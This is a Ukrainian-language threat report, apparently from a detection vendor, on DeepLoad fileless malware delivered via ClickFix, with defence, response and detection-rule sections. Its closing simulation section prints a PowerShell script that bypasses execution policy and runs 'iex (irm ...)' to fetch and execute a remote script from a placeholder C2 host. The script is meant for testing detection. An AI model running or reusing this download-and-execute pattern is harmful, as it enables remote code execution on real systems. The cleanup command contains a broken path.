Шкідливе програмне забезпечення DeepLoad поєднує доставку ClickFix із уникаючими методами, створеними за допомогою ІІ
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
DeepLoad – це безфайлове шкідливе програмне забезпечення, яке розповсюджується через соціальну інженерію ClickFix. Воно спирається на обфускований завантажувач PowerShell, ін’єкцію шелкоду в пам’ять в надійні процеси Windows і згенерований AI «шум» для зниження точності статичного виявлення. Завантажувач забезпечує стійкість, використовуючи розкладене завдання і підписки на події WMI, може поширюватися через USB-носії, а також краде облікові дані через підроблений браузерний розширення та супутній компонент filemanager.exe.
Розслідування
Звіт описує початковий доступ, який починається з виконання жертвою команди PowerShell, після чого завантажувач отримується через mshta.exe. Завантажувач використовує Add-Type для генерації тимчасового DLL під час виконання, а потім ін’єктує шелкод у LockAppHost.exe за допомогою ін’єкції на основі APC. Постійність підтримується через розкладене завдання і приховану підписку на події WMI, здатну відновлювати інфекцію навіть після очищення, з відзначеним вікном затримки приблизно в три дні. Викрадення облікових даних приписується filemanager.exe разом з підробленим браузерним розширенням, що працює паралельно.
Захист
Увімкніть PowerShell Script Block Logging і відстежуйте підозрілі ланцюги виконання PowerShell. Аудитьте мережеву активність mshta.exe, моніторьте несподіване створення розкладених завдань і виявляйте аномальне використання QueueUserAPC, що вказує на ін’єкцію APC. Під час відновлення чітко перелічте й видаліть підписки на події WMI, а не покладайтеся лише на очищення файлів/реєстру. Змініть скомпрометовані облікові дані та видаліть несанкціоновані розширення браузера, щоб перекрити шляхи збору облікових даних.
Відповідь
Якщо виявлено активність DeepLoad, ізолюйте хост, зупиніть шкідливу активність PowerShell та завершіть всі ін’єктовані процеси. Видаліть розкладене завдання та видаліть пов’язану підписку WMI, а потім викоріньте filemanager.exe та шкідливе розширення браузера. Змініть всі потенційно скомпрометовані облікові дані, очистіть підключені USB-носії та переконайтеся, що система перевірена на залишкові артефакти ін’єкції, перш ніж знову повернути її в експлуатацію.
Ключові слова: DeepLoad, ClickFix, безфайлове шкідливе ПЗ, завантажувач PowerShell, mshta.exe, Add-Type, шелкод у пам’яті, ін’єкція APC, QueueUserAPC, LockAppHost.exe, постійність розкладених завдань, підписка на події WMI, поширення через USB, шкідливе розширення браузера, викрадення облікових даних.
Потік атаки
Виявлення
Підозріле управління та контроль під час запиту DNS на незвичний домен верхнього рівня (TLD) (через dns)
Перегляд
Виклик підозрілих функцій Windows API з PowerShell (через powershell)
Перегляд
Завантаження або передача через PowerShell (через cmdline)
Перегляд
Можливе спілкування C2 через HTTP на прямий IP з незвичним портом (через proxy)
Перегляд
Виявлення шкідливого ПЗ DeepLoad через зловживання mshta.exe і ін’єкцію APC [Створення процесу Windows]
Перегляд
Виявлення шкідливого ПЗ DeepLoad з використанням обходу PowerShell та Add-Type [Windows PowerShell]
Перегляд
Виконання симуляції
Передумова: перевірка телеметрії та базової лінії має бути успішною.
Опис: цей розділ детально описує точне виконання техніки супротивника (TTP), призначеної для активації правила виявлення. Команди і нарратив МАЮТЬ безпосередньо відображати ідентифіковані TTP і мають на меті генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або нерелевантні приклади призведуть до помилкового діагнозу.
-
Опис атаки та команди:
- Початковий плацдарм: Атакуючий має PowerShell сесію з низькими привілеями на хості жертви.
- Обхід політики виконання: Вони запускають PowerShell з параметром
-ep Bypassщоб ігнорувати будь-які обмеження виконання сценарію. - Компільовка навантаження .NET: Використовуючи
Add-Type, вони вбудовують крихітний клас на C#, який, при створенні, здійснює веб-запит до C2 сервера (http://10.0.0.5:3015/index). - Завантаження та виконання віддаленого сценарію: Атакуючий передає результат
irm(Invoke‑RestMethod) вiex, виконуючи зловмисний сценарій у пам’яті. - Результуюча телеметрія: Командний рядок, записаний ОС, містить три необхідні рядки (
-ep Bypass,Add-Type,iex(irm http://…:3015/index)), що відповідає правилу Sigma.
-
Скрипт регресійного тестування:
# Зловмисне виконання, подібне до DeepLoad # Цей сценарій відтворює точний шаблон команд, необхідний для запуску правила Sigma. $c2 = "http://10.0.0.5:3015/index" $payload = @" using System; using System.Net; public class Loader { public static void Run() { new WebClient().DownloadString(""$c2""); } } "@ # Виклик PowerShell з прапором обходу, компіляція навантаження, а потім виконання віддаленого сценарію powershell -NoProfile -ExecutionPolicy Bypass -Command ` "Add-Type -TypeDefinition `$payload; ` iex (irm $c2)" -
Команди очищення:
# Видаліть будь-які тимчасові файли або завантажені збірки (якщо вони були збережені) Remove-Item -Path "$env:TEMPloader.dll" -ErrorAction SilentlyContinue # При необхідності, очистіть транскрипцію PowerShell (якщо ввімкнено) Clear-Host
Кінець звіту